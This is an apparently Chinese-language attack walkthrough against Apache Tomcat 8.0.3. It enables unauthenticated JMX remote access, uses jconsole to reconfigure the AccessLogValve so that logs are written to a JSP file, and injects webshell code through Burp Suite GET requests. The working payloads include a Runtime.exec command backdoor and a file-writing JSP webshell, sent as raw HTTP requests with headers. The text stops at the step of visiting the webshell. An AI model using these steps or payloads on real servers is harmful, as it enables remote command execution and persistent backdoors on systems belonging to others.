1、 配置tomcat启动jconsole到1099端口的配置:
- cd /opt/apache-tomcat-8.0.3/bin
- vi catalina.sh
- Code
- # OS specific support. $var _must_ be set to either true or false.添加如下变量:
- CATALINA_OPTS="$JAVA_OPTS -Djava.rmi.server.hostname=192.168.1.100
- -Dcom.sun.management.jmxremote.port=1099
- -Dcom.sun.management.jmxremote.authenticate=false
- -Dcom.sun.management.jmxremote.ssl=false"
//重启tomcat:
./shutdown.sh
./startup.sh
2、 本地->运行输入:jconsole

- Dcatalina.home=/opt/apache-tomcat-8.0.3
//获得/manager/html后台的访问密码:
//上传webshell:
- MBeans->Catalina->Valve->localhost->AccessLogValue->操作 可以写入jsp后门:
- ../webapps/docs/cesafe.jsp
- /opt/apache-tomcat-8.0.3/webapps/docs/cesafe.jsp

//使用burpsuite写入cmd后门:
- GET /test?<%Runtime.getRuntime().exec(request.getParameter("www.cesafe.com"));%> HTTP/1.1
- Host: 192.168.1.100:8080
Code
- GET /test?<%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="java.io.File"></jsp:directive><jsp:directive.page import="java.io.OutputStream"></jsp:directive><jsp:directive.page import="java.io.FileOutputStream"></jsp:directive><% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>0<%}}if(i==0){%>1<%}%><form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart"> HTTP/1.1
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Maxthon/5.2.3.6000
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
- DNT: 1
- Accept-Language: zh-CN
- Cookie: JSESSIONID=FD5D2DAF6665FC4C3CC90C814757BF97
- Connection: close
- Content-Length: 2
//访问webshell地址: